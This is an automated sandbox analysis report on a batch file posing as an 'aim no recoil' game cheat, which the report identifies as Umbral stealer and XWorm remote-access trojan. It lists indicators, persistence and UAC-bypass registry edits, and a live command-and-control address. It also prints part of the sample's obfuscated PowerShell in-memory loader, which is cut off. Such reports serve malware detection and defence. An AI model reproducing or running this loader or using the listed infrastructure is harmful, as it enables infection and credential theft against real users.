umbral | 9a3a79c058974896eb02b3f58409e441fb0e7dc6a391269001fdf7fb3aaaae19

Analysis

max time kernel
300s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20250211-en
resource tags

arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
submitted
12-02-2025 18:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Aim_No_Recoil.bat
Size

1KB
MD5

42b088711bf592347c0f48e8f791faf1
SHA1

4ab3a3361284f35a626e2f06844eeb3e6e22dccc
SHA256

9a3a79c058974896eb02b3f58409e441fb0e7dc6a391269001fdf7fb3aaaae19
SHA512

59e4c9eb7d0a72f305797f4ab408d836af6497e2a4ae032f2dcdec16fbd875119e235daf40b2f0a546e039797230f94c0f571b87873778d3bfc41bcf2b6142e7

Score

10^/10

umbral xworm defense_evasion discovery execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

3.1

185.172.175.125:5000

Mutex

Uto2xJheY5reQlME

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0011000000023cf4-925.dat	family_umbral
behavioral2/memory/324-943-0x000001753C3C0000-0x000001753C400000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000d000000023cf5-45.dat	family_xworm
behavioral2/memory/1696-52-0x0000000000080000-0x000000000008E000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2188 created 612	2188	powershell.EXE	5

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConSENtprOmPTbEHAViorAdMIN = "0"	powershell.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
21	264	powershell.exe
27	264	powershell.exe
49	2184	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2188	powershell.EXE
264	powershell.exe
2184	powershell.exe
4836	powershell.exe
1588	powershell.exe
4872	powershell.exe
3452	powershell.exe
4536	powershell.exe
3608	powershell.exe
2520	powershell.exe

Downloads MZ/PE file 4 IoCs

flow	pid	Process
21	264	powershell.exe
70	1184	svchost.exe
27	264	powershell.exe
49	2184	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation	svOrbEl0.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk	svOrbEl0.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk	svOrbEl0.exe

Executes dropped EXE 10 IoCs

pid	Process
1912	FMyUS.eXe
2888	bFQLYYir.exe
1696	svOrbEl0.exe
2844	svOrbEl0.exe
744	1ZRs6.EXe
324	winglog32.exe
1540	svOrbEl0.exe
3608	svOrbEl0.exe
2196	svOrbEl0.exe
2844	svOrbEl0.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svOrbEl0 = "C:\\Users\\Admin\\AppData\\Roaming\\svOrbEl0.exe"	svOrbEl0.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ip-api.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2188 set thread context of 4960	2188	powershell.EXE	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FMyUS.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1ZRs6.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4816	MicrosoftEdgeUpdate.exe

Modifies data under HKEY_USERS 56 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={3EDCD4AD-CB12-4CA4-B18B-AC49C2909AFD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1739386275"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 12 Feb 2025 18:51:08 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
928	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
264	powershell.exe
264	powershell.exe
3452	powershell.exe
3452	powershell.exe
1912	FMyUS.eXe
1912	FMyUS.eXe
1912	FMyUS.eXe
1912	FMyUS.eXe
2888	bFQLYYir.exe
2888	bFQLYYir.exe
2888	bFQLYYir.exe
2888	bFQLYYir.exe
4536	powershell.exe
4536	powershell.exe
4536	powershell.exe
3608	powershell.exe
3608	powershell.exe
2520	powershell.exe
2520	powershell.exe
2520	powershell.exe
2188	powershell.EXE
2188	powershell.EXE
2188	powershell.EXE
2188	powershell.EXE
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4836	powershell.exe
4960	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	264	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	1912	FMyUS.eXe
Token: SeDebugPrivilege	2888	bFQLYYir.exe
Token: SeDebugPrivilege	1696	svOrbEl0.exe
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2844	svOrbEl0.exe
Token: SeDebugPrivilege	2188	powershell.EXE
Token: SeDebugPrivilege	2188	powershell.EXE
Token: SeDebugPrivilege	4960	dllhost.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeAuditPrivilege	2124	svchost.exe
Token: SeAuditPrivilege	2124	svchost.exe
Token: SeAuditPrivilege	2124	svchost.exe
Token: SeDebugPrivilege	324	winglog32.exe
Token: SeIncreaseQuotaPrivilege	228	wmic.exe
Token: SeSecurityPrivilege	228	wmic.exe
Token: SeTakeOwnershipPrivilege	228	wmic.exe
Token: SeLoadDriverPrivilege	228	wmic.exe
Token: SeSystemProfilePrivilege	228	wmic.exe
Token: SeSystemtimePrivilege	228	wmic.exe
Token: SeProfSingleProcessPrivilege	228	wmic.exe
Token: SeIncBasePriorityPrivilege	228	wmic.exe
Token: SeCreatePagefilePrivilege	228	wmic.exe
Token: SeBackupPrivilege	228	wmic.exe
Token: SeRestorePrivilege	228	wmic.exe
Token: SeShutdownPrivilege	228	wmic.exe
Token: SeDebugPrivilege	228	wmic.exe
Token: SeSystemEnvironmentPrivilege	228	wmic.exe
Token: SeRemoteShutdownPrivilege	228	wmic.exe
Token: SeUndockPrivilege	228	wmic.exe
Token: SeManageVolumePrivilege	228	wmic.exe
Token: 33	228	wmic.exe
Token: 34	228	wmic.exe
Token: 35	228	wmic.exe
Token: 36	228	wmic.exe
Token: SeIncreaseQuotaPrivilege	228	wmic.exe
Token: SeSecurityPrivilege	228	wmic.exe
Token: SeTakeOwnershipPrivilege	228	wmic.exe
Token: SeLoadDriverPrivilege	228	wmic.exe
Token: SeSystemProfilePrivilege	228	wmic.exe
Token: SeSystemtimePrivilege	228	wmic.exe
Token: SeProfSingleProcessPrivilege	228	wmic.exe
Token: SeIncBasePriorityPrivilege	228	wmic.exe
Token: SeCreatePagefilePrivilege	228	wmic.exe
Token: SeBackupPrivilege	228	wmic.exe
Token: SeRestorePrivilege	228	wmic.exe
Token: SeShutdownPrivilege	228	wmic.exe
Token: SeDebugPrivilege	228	wmic.exe
Token: SeSystemEnvironmentPrivilege	228	wmic.exe
Token: SeRemoteShutdownPrivilege	228	wmic.exe
Token: SeUndockPrivilege	228	wmic.exe
Token: SeManageVolumePrivilege	228	wmic.exe
Token: 33	228	wmic.exe
Token: 34	228	wmic.exe
Token: 35	228	wmic.exe
Token: 36	228	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2336	svchost.exe
Token: SeIncreaseQuotaPrivilege	2336	svchost.exe

Suspicious use of UnmapMainImage 5 IoCs

pid	Process
3944	RuntimeBroker.exe
3400	Explorer.EXE
3824	RuntimeBroker.exe
5008	RuntimeBroker.exe
5056	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 264	5068	cmd.exe	91
PID 5068 wrote to memory of 264	5068	cmd.exe	91
PID 264 wrote to memory of 3452	264	powershell.exe	93
PID 264 wrote to memory of 3452	264	powershell.exe	93
PID 264 wrote to memory of 1912	264	powershell.exe	95
PID 264 wrote to memory of 1912	264	powershell.exe	95
PID 264 wrote to memory of 1912	264	powershell.exe	95
PID 1912 wrote to memory of 2888	1912	FMyUS.eXe	96
PID 1912 wrote to memory of 2888	1912	FMyUS.eXe	96
PID 264 wrote to memory of 1696	264	powershell.exe	97
PID 264 wrote to memory of 1696	264	powershell.exe	97
PID 1696 wrote to memory of 4536	1696	svOrbEl0.exe	98
PID 1696 wrote to memory of 4536	1696	svOrbEl0.exe	98
PID 1696 wrote to memory of 3608	1696	svOrbEl0.exe	100
PID 1696 wrote to memory of 3608	1696	svOrbEl0.exe	100
PID 1696 wrote to memory of 2520	1696	svOrbEl0.exe	102
PID 1696 wrote to memory of 2520	1696	svOrbEl0.exe	102
PID 1696 wrote to memory of 928	1696	svOrbEl0.exe	104
PID 1696 wrote to memory of 928	1696	svOrbEl0.exe	104
PID 264 wrote to memory of 744	264	powershell.exe	109
PID 264 wrote to memory of 744	264	powershell.exe	109
PID 264 wrote to memory of 744	264	powershell.exe	109
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 2188 wrote to memory of 4960	2188	powershell.EXE	112
PID 4960 wrote to memory of 612	4960	dllhost.exe	5
PID 4960 wrote to memory of 672	4960	dllhost.exe	7
PID 4960 wrote to memory of 952	4960	dllhost.exe	12
PID 4960 wrote to memory of 316	4960	dllhost.exe	13
PID 4960 wrote to memory of 384	4960	dllhost.exe	14
PID 4960 wrote to memory of 732	4960	dllhost.exe	15
PID 4960 wrote to memory of 652	4960	dllhost.exe	16
PID 4960 wrote to memory of 1048	4960	dllhost.exe	17
PID 4960 wrote to memory of 1156	4960	dllhost.exe	19
PID 4960 wrote to memory of 1172	4960	dllhost.exe	20
PID 4960 wrote to memory of 1264	4960	dllhost.exe	21
PID 4960 wrote to memory of 1296	4960	dllhost.exe	22
PID 4960 wrote to memory of 1312	4960	dllhost.exe	23
PID 4960 wrote to memory of 1320	4960	dllhost.exe	24
PID 4960 wrote to memory of 1332	4960	dllhost.exe	25
PID 4960 wrote to memory of 1480	4960	dllhost.exe	26
PID 4960 wrote to memory of 1528	4960	dllhost.exe	27
PID 4960 wrote to memory of 1556	4960	dllhost.exe	28
PID 4960 wrote to memory of 1636	4960	dllhost.exe	29
PID 4960 wrote to memory of 1684	4960	dllhost.exe	30
PID 4960 wrote to memory of 1748	4960	dllhost.exe	31
PID 4960 wrote to memory of 1784	4960	dllhost.exe	32
PID 4960 wrote to memory of 1816	4960	dllhost.exe	33
PID 4960 wrote to memory of 1848	4960	dllhost.exe	34
PID 4960 wrote to memory of 1916	4960	dllhost.exe	35
PID 4960 wrote to memory of 1952	4960	dllhost.exe	36
PID 4960 wrote to memory of 1072	4960	dllhost.exe	37
PID 4960 wrote to memory of 2124	4960	dllhost.exe	39
PID 4960 wrote to memory of 2268	4960	dllhost.exe	40
PID 4960 wrote to memory of 2336	4960	dllhost.exe	41
PID 4960 wrote to memory of 2420	4960	dllhost.exe	42
PID 4960 wrote to memory of 2444	4960	dllhost.exe	43
PID 4960 wrote to memory of 2524	4960	dllhost.exe	44
PID 4960 wrote to memory of 2544	4960	dllhost.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:316
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dcdf813a-fb50-4a02-97fb-ab40d4056ee1}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4960

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1156
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2912
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
  2⤵
  PID:4696
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource core
    3⤵
    PID:740
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fvisBDWiciNp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lZGMuufNkXjzJa,[Parameter(Position=1)][Type]$WXYfxHjLiL)$EaVhVFkREQv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'fl'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+'u'+'b'+''+[Char](108)+'i'+'c'+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+'C'+[Char](108)+''+'a'+'s'+'s'+''+','+''+[Char](65)+'u'+'t'+'oCl'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$EaVhVFkREQv.DefineConstructor(''+'R'+''+'T'+'Spe'+'c'+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'me'+','+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+',P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lZGMuufNkXjzJa).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$EaVhVFkREQv.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+'t'+'u'+[Char](97)+'l',$WXYfxHjLiL,$lZGMuufNkXjzJa).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+'m'+'e,'+[Char](77)+''+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');Write-Output $EaVhVFkREQv.CreateType();}$PCclBlqhkmEmR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 